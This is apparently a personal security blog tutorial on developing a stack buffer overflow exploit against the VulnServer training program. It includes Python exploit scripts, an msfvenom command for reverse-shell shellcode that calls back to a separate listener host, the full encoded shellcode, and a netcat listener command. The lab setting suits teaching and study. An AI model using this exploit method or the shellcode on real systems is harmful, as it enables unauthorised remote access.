A buffer overflow occurs when input data within a program exceeds the designed memory allocation. The remaining input data can often be written to memory, and as such it is often possible to exploit this in unintended ways.
Using the 'VulnServer' program we'll demonstrate a basic stack overflow and construct a script to perform remote code execution to gain a shell on a sample system.
Word of Warning
The purpose of this blog is to provide an outlet to note down the methodologies and tricks I've learned along the way, and hopefully this will be beneficial to someone else. I do not claim to be an expert in this field and there are many other blog posts and articles that delve in to considerably better detail.
Information is free - take the good bits and leave the rest!
Set up a Development System
I've used a 32 bit version of Windows Vista as a testbed for exploit development. Personally, I prefer to use Immunity Debugger rather than OllyDbg, but each to their own. They're very similar and each has its own supplemental toolset.
It's worth having the Mona scripts installed when using Immunity, but mostly as a time saving exercise. There are manual and semi-automated methods of doing the same thing, but they are invaluable in some cases.
Disable the Windows firewall as it'll just be a nightmare trying to debug a reverse or bind shell if you've left it on.
Run the Debugger and Attach the Process
Nothing difficult here: just run the 'vulnserver.exe' program, navigate to 'File', then click on 'Attach' and find the program somewhere in the list. You can just open it directly in some cases.
Once that's done, you'll notice that the program has halted/failed to open.
Just hit run a couple of times to get things going.
Access the Server and Basic Enumeration
Next, we can do a port scan to identify any publicly accessible services, but I'll just save you some time and state that the VulnServer port is
9999. Netcat to it and you'll have an interactive prompt.
Our first step will be to simply interact with the server and see what sort of functionality there is. Doing so will show some interaction in the debugger, but this is intentional. I'll run the
HELP command as we're kindly prompted to do so.
There are a load of options here, each with a gradient of difficulty. As this blog is focusing on the basics, we'll target one that I know is vulnerable to an entry-level overflow (
I've input some parameters after the
TRUN command as you can see below, and the response is
Now, we could attempt to identify an overflow completely manually, but this would be extremely arduous. I'll write a quick python script that'll interact with the server to automate this slightly.
#!/usr/bin/env python import socket target = "192.168.111.4" port = 9999 prefix = "TRUN ./" buffer = "A" * 100 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target,port)) print (sock.recv(1024)) sock.send(prefix + buffer) print (sock.recv(1024)) sock.close()
This script imports the Python socket module, sets a variable for the command we're sending, and then creates a buffer variable. We'll initially set the buffer size as 100 * A characters (
0x41 as hex). We can increase this manually after each run (assuming that the program didn't crash) or we can loop through the size increase and sending the buffer string.
We'll send this initial buffer of 100 bytes, but the program still remains operational as we can see there is a
'TRUN COMPLETE' response.
Also, the debugger is still running, which is a bit of a giveaway.
I'll save us both some time and avoid going through some Python examples and state that I wrote a quick rudimentary fuzzer for these sorts of things, which I'll use going forward. After running this with the required parameters the fuzzer will loop over the buffer increase.
Then it will eventually spit out a rough estimate as to which lengths crashed the server. This shows that it's between 2100 and 2200 bytes
Looking at the debugger, which is now paused, we can see that there are a few registers that have the A (
0x41) characters in them. Specifically, the
EIP (Extended Instruction Pointer) register, which would allow us to directly control execution flow during the buffer overflow.
Right-clicking on the
ESP (Stack Pointer) register value and then 'Follow in Dump' shows the virtual memory address and the values that are currently stored in memory. This is our numerous amount of A characters.
Initial Buffer Offset
The next step is to identify the exact number of characters that takes us to the EIP register. This isn't always feasible with more modern system architectures (e.g. DEP and ASLR, among other things), but as this is a simple overflow vulnerability this will be all it takes for us to introduce our exploit shellcode.
To do this, the simplest way is to send a unique string of characters as the buffer string and then identify which characters are stored in
EIP. There are probably dozens of tools out there, with the most common being the 'pattern_create' tool within the Metasploit Framework. However, I've again built one in to WoollyMammoth.
After sending the offset string, we can see that the debugger has paused again and the EIP register contains a hex string. To the upper-right there's an excerpt of the unique string pattern that is sent, which is being stored in
EIP register value to clipboard, paste it in to your tool of choice, and you'll see the offset position for the initial buffer, which will take us up to the
EIP register. The value that follow this will be where we need to handle further execution flow.
Execution flow control
Once we have our buffer offset, we can modify the original python script (yes, I've built something in to WoollyMammoth, but ignore that for now) to account for this.
#!/usr/bin/env python import socket target = "192.168.111.4" port = 9999 prefix = "TRUN ./" buffer = "A" * 2005 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target,port)) print (sock.recv(1024)) sock.send(prefix + buffer) print (sock.recv(1024)) sock.close()
I've set the buffer as 2005 * A characters, which would then need to follow a command that would allow us to execute shellcode. This will of course be an 8 byte value, which we'll either need to find within the 'vulnserver.exe' program or an associated module that we can access through the execution permissions.
The type of commands that we're looking to find are
CALL ESP, or possibly
PUSH ESP, RET. This will execute an instruction to jump to the memory address in the ESP register and then execute the instruction here (i.e. EIP, which is where we'll place the shellcode).
'essfunc.dll' library comes packaged as a requirement to run the vulnserver program we can look in there. Click the 'Executable Modules' icon and then double click on the 'essfunc.dll' library.
This loads the view of the module within the debugger.
Right-click in the CPU view window (top-left) and then Search For > Command (or just hit Ctrl + F). Enter the
JMP ESP instruction to identify a valid intruction that we can use.
Mona can be used to automate this with the command
!mona find -s "\xff\xe4" -m "essfunc.dll" (using the opcodes for
JMP ESP) or
!mona jmp -r esp -m "essfunc.dll" for the instructions directly. The output of Mona is useful to identify any protections that may be in place (ASLR, etc).
After identifying a valid
JMP instruction we can modify the Python script to incorporate this address, which will be written to the
#!/usr/bin/env python import socket target = "192.168.111.4" port = 9999 prefix = "TRUN ./" jmp = "\xaf\x11\x50\x62" buffer = ("A" * 2005) + jmp sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target,port)) print (sock.recv(1024)) sock.send(prefix + buffer) print (sock.recv(1024)) sock.close()
The memory address byte order has to be written backwards (but not by reversing the individual bytes) due to the x86 architecture using little-endian, which requires the least-significant bits first.
Now we have our 2005 * A characters, which takes us up to the buffer offset. Then this follows with the
EIP register being set to execute the
JMP ESP instruction, which will execute the shellcode at the
ESP memory address.
I'll create shellcode for a basic reverse TCP shell using the following 'msfvenom' command and will add this to the Python script, which will be set after the JMP ESP 'jmp' variable:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.5 LPORT=4444 -f python -v sc -b '\x00' EXITFUNC=none. Note - I've specified
-b '\x00' to avoid null-byte characters in the shellcode.
In the Python script I've also included the
\x90 character 20 times. This instruction is a no-operation (
NOP) instruction, which essentially does nothing and I've added it to ensure that the shellcode (which is automatically encoded with msfvenom) has space to decode.
#!/usr/bin/env python import socket target = "192.168.111.4" port = 9999 prefix = "TRUN ./" jmp = "\xaf\x11\x50\x62" sc = ( "\xdb\xcb\xb8\x83\x5e\xf1\xf4\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x52\x83\xc3\x04\x31\x43\x13\x03\xc0\x4d\x13\x01\x3a\x99\x51" "\xea\xc2\x5a\x36\x62\x27\x6b\x76\x10\x2c\xdc\x46\x52\x60\xd1" "\x2d\x36\x90\x62\x43\x9f\x97\xc3\xee\xf9\x96\xd4\x43\x39\xb9" "\x56\x9e\x6e\x19\x66\x51\x63\x58\xaf\x8c\x8e\x08\x78\xda\x3d" "\xbc\x0d\x96\xfd\x37\x5d\x36\x86\xa4\x16\x39\xa7\x7b\x2c\x60" "\x67\x7a\xe1\x18\x2e\x64\xe6\x25\xf8\x1f\xdc\xd2\xfb\xc9\x2c" "\x1a\x57\x34\x81\xe9\xa9\x71\x26\x12\xdc\x8b\x54\xaf\xe7\x48" "\x26\x6b\x6d\x4a\x80\xf8\xd5\xb6\x30\x2c\x83\x3d\x3e\x99\xc7" "\x19\x23\x1c\x0b\x12\x5f\x95\xaa\xf4\xe9\xed\x88\xd0\xb2\xb6" "\xb1\x41\x1f\x18\xcd\x91\xc0\xc5\x6b\xda\xed\x12\x06\x81\x79" "\xd6\x2b\x39\x7a\x70\x3b\x4a\x48\xdf\x97\xc4\xe0\xa8\x31\x13" "\x06\x83\x86\x8b\xf9\x2c\xf7\x82\x3d\x78\xa7\xbc\x94\x01\x2c" "\x3c\x18\xd4\xe3\x6c\xb6\x87\x43\xdc\x76\x78\x2c\x36\x79\xa7" "\x4c\x39\x53\xc0\xe7\xc0\x34\x2f\x5f\xa5\xc1\xc7\xa2\x39\xdb" "\x4b\x2a\xdf\xb1\x63\x7a\x48\x2e\x1d\x27\x02\xcf\xe2\xfd\x6f" "\xcf\x69\xf2\x90\x9e\x99\x7f\x82\x77\x6a\xca\xf8\xde\x75\xe0" "\x94\xbd\xe4\x6f\x64\xcb\x14\x38\x33\x9c\xeb\x31\xd1\x30\x55" "\xe8\xc7\xc8\x03\xd3\x43\x17\xf0\xda\x4a\xda\x4c\xf9\x5c\x22" "\x4c\x45\x08\xfa\x1b\x13\xe6\xbc\xf5\xd5\x50\x17\xa9\xbf\x34" "\xee\x81\x7f\x42\xef\xcf\x09\xaa\x5e\xa6\x4f\xd5\x6f\x2e\x58" "\xae\x8d\xce\xa7\x65\x16\xfe\xed\x27\x3f\x97\xab\xb2\x7d\xfa" "\x4b\x69\x41\x03\xc8\x9b\x3a\xf0\xd0\xee\x3f\xbc\x56\x03\x32" "\xad\x32\x23\xe1\xce\x16" ) buffer = ("A" * 2005) + jmp + ('\x90' * 20) + sc sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target,port)) print (sock.recv(1024)) sock.send(prefix + buffer) print (sock.recv(1024)) sock.close()
Stepping Through Execution
To get a clear understanding of what is happening, we'll step through the execution flow of the exploit in action. To do this, click the 'Go To Expression' icon and enter the address of the
JMP ESP address that we identified earlier.
Set a breakpoint by pressing the F2 key when highlighting the address, which will stop the execution flow at this point.
Next, press F7 once (or the step-into icon) and you'll arrive at the the initial NOP that was set following our
jmp variable in the Python script.
Continue stepping through until the last NOP and you'll notice that not much of anything happens. I encourage you to set a netcat listener (
nc -nvlp 4444) at this point, as if you're like me you'll have forgotten both attempts at trying to get a screenshot.
Upon continuing to step through (should you choose to) the shellcode that was injected will start to decode itself in memory. By default, msfvenom uses the
shikata_ga_nai encoder (where it feasibly can), which will eventually execute after it decodes itself in memory.
Reaping the Rewards
Once full execution flow is resumed we're presented with a nice command line shell to the Windows system.
As mentioned, I built a basic overflow (
buffer offset +
shellcode) feature in to WoollyMammoth:
woollymammoth.py exploit --prefix "TRUN ./" -o 2005 -e "\xaf\x11\x50\x62" -t 192.168.111.4 -p 9999 -n 20 --shellcode <INLINE SHELLCODE>"